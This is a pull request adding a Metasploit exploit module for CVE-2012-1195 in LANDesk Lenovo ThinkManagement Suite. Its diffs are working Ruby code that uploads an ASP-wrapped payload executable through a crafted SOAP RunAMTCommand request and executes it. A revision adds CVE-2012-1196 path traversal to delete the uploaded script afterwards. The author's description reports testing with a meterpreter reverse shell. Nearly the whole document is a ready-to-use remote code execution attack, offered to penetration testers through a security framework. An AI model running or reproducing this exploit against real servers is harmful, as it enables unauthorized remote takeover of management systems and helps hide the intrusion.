### PR TITLE
exploit module added for CVE-2012-1195

### DIFF
--- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
+++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
@@ -19,10 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module can be used to execute a payload on LANDesk Lenovo
 				ThinkManagement Suite 9.0.2 and 9.0.3.
-				The payload is uploaded as an ASP script using a specially crafted
-				SOAP request to /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx
+				The payload is uploaded as an ASP script sending a specially crafted
+				SOAP request to "/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
 				specifying a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
 				as argument.
+				After execution the ASP script with the payload is deleted sending a
+				specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx"
+				specifying a "SetTaskLogByFile" operation.
 			},
 			'Author'      => [
 				'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
@@ -39,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Targets'     =>
 				[
-					[ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3', { } ],
+					[ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
 				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => false,
@@ -63,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
 		upload_random = rand_text_alpha(rand(6) + 6)
-		upload_xml_path = "upl\\#{upload_random}.asp"
+		upload_xml_path = "ldlogon\\#{upload_random}.asp"
 
 		soap = <<-eos
 <?xml version="1.0" encoding="utf-8"?>
@@ -71,10 +74,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	<soap:Body>
 		<RunAMTCommand xmlns="http://tempuri.org/">
 			<Command>-PutUpdateFileCore</Command>
-			<Data1>aaaa</Data1>
+			<Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>
 			<Data2>#{upload_xml_path}</Data2>
 			<Data3>#{asp}</Data3>
-			<ReturnString>bbbb</ReturnString>
+			<ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>
 		</RunAMTCommand>
 	</soap:Body>
 </soap:Envelope>
@@ -91,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method'       => 'POST',
 			'ctype'        => 'text/xml; charset=utf-8',
 			'headers'	=> {
-					'SOAPAction'     => '"http://tempuri.org/RunAMTCommand"',
+					'SOAPAction'     => "\"http://tempuri.org/RunAMTCommand\"",
 				},
 			'data'         => soap,
 		}, 20)
@@ -106,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# EXECUTE
 		#
-		upload_path = uri_path + "upl/#{upload_random}.asp"
+		upload_path = uri_path + "ldlogon/#{upload_random}.asp"
 		print_status("Executing #{upload_path}...")
 
 		res = send_request_cgi({
@@ -121,6 +124,44 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		if (res.code < 200 or res.code >= 300)
 			print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]")
+			return
+		end
+
+
+		#
+		# DELETE
+		#
+		soap = <<-eos
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+	<soap:Body>
+		<SetTaskLogByFile xmlns="http://tempuri.org/">
+			<computerIdn>1</computerIdn>
+			<taskid>1</taskid>
+			<filename>../#{upload_random}.asp</filename>
+			</SetTaskLogByFile>
+	</soap:Body>
+</soap:Envelope>
+		eos
+
+		attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
+		print_status("Deleting #{upload_path} through #{attack_url}...")
+
+		res = send_request_cgi({
+			'uri'          => attack_url,
+			'method'       => 'POST',
+			'ctype'        => 'text/xml; charset=utf-8',
+			'headers'	=> {
+					'SOAPAction'     => "\"http://tempuri.org/SetTaskLogByFile\"",
+				},
+			'data'         => soap,
+		}, 20)
+
+		if (! res)
+			print_error("Deletion failed on #{attack_url} [No Response]")
+			return
+		elsif (res.code < 200 or res.code >= 300)
+			print_error("Deletion failed on #{attack_url} [#{res.code} #{res.message}]")
 			return
 		end
 

--- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
+++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
@@ -1,0 +1,130 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize
+		super(
+			'Name'        => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
+			'Description'    => %q{
+					This module can be used to execute a payload on LANDesk Lenovo
+				ThinkManagement Suite 9.0.2 and 9.0.3.
+				The payload is uploaded as an ASP script using a specially crafted
+				SOAP request to /landesk/managementsuite/core/core.anonymous/ServerSetup.asmx
+				specifying a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
+				as argument.
+			},
+			'Author'      => [
+				'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
+				'juan vazquez' # Metasploit module
+			],
+			'Version'     => '$Revision: $',
+			'Platform'    => 'win',
+			'References'  =>
+				[
+					['CVE', '2012-1195'],
+					['OSVDB', '79276'],
+					['BID', '52023'],
+					['URL', 'http://www.exploit-db.com/exploits/18622/']
+				],
+			'Targets'     =>
+				[
+					[ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => 'Feb 15 2012'
+		)
+
+		register_options(
+			[
+				OptString.new('PATH', [ true,  "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
+			], self.class)
+	end
+
+	def exploit
+
+		# Generate the ASP containing the EXE containing the payload
+		exe = generate_payload_exe
+		asp = Msf::Util::EXE.to_exe_asp(exe)
+
+		# htmlentities like encoding
+		asp = asp.gsub("&", "&amp;").gsub("\"", "&quot;").gsub("'", "&#039;").gsub("<", "&lt;").gsub(">", "&gt;")
+
+		uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
+		upload_random = rand_text_alpha(rand(6) + 6)
+		upload_xml_path = "upl\\#{upload_random}.asp"
+
+		soap = <<-eos
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+	<soap:Body>
+		<RunAMTCommand xmlns="http://tempuri.org/">
+			<Command>-PutUpdateFileCore</Command>
+			<Data1>aaaa</Data1>
+			<Data2>#{upload_xml_path}</Data2>
+			<Data3>#{asp}</Data3>
+			<ReturnString>bbbb</ReturnString>
+		</RunAMTCommand>
+	</soap:Body>
+</soap:Envelope>
+		eos
+
+		#
+		# UPLOAD
+		#
+		attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
+		print_status("Uploading #{asp.length} bytes through #{attack_url}...")
+
+		res = send_request_cgi({
+			'uri'          => attack_url,
+			'method'       => 'POST',
+			'ctype'        => 'text/xml; charset=utf-8',
+			'headers'	=> {
+					'SOAPAction'     => '"http://tempuri.org/RunAMTCommand"',
+				},
+			'data'         => soap,
+		}, 20)
+
+		if (! res)
+			print_status("Timeout - Trying to execute the payload anyway")
+		elsif (res.code < 200 or res.code >= 300)
+			print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]")
+			return
+		end
+
+		#
+		# EXECUTE
+		#
+		upload_path = uri_path + "upl/#{upload_random}.asp"
+		print_status("Executing #{upload_path}...")
+
+		res = send_request_cgi({
+			'uri'          =>  upload_path,
+			'method'       => 'GET'
+		}, 20)
+
+		if (! res)
+			print_error("Execution failed on #{upload_path} [No Response]")
+			return
+		end
+
+		if (res.code < 200 or res.code >= 300)
+			print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]")
+			return
+		end
+
+		handler
+	end
+
+end

--- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
+++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
@@ -36,9 +36,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'  =>
 				[
 					['CVE', '2012-1195'],
+					['CVE', '2012-1196'],
 					['OSVDB', '79276'],
+					['OSVDB', '79277'],
 					['BID', '52023'],
-					['URL', 'http://www.exploit-db.com/exploits/18622/']
+					['URL', 'http://www.exploit-db.com/exploits/18622/'],
+					['URL', 'http://www.exploit-db.com/exploits/18623/']
 				],
 			'Targets'     =>
 				[


### PR DESCRIPTION
I would like to make a contribution to metasploit with a module for "CVE-2012-1195: Lenovo ThinkManagement Console landesk/managementsuite/core/core.anonymous/ServerSetup.asmx RunAMTCommand Operation -PutUpdateFileCore Command Parsing Arbitrary File Upload" with the hope you find it useful. 

The payload use the Arbitrary File Upload to upload the payload as an ASP script and execute it through a second HTTP Request.

I've tried to use the CVE-2012-1196 to delete the ASP script uploaded, but in my tests the arbitrary file deletion is limited to the $INSTALL\ldlogon path, where $INSTALL = C:\Program Files\LANDesk\ManagementSuite by default.

I've tested on Windows 2003 SP2 with windows/meterpreter_reverse_tcp.

Finally I'm learning and training exploit writing and metasploit dev so any feedback about the code is welcome!

Regards,

juan
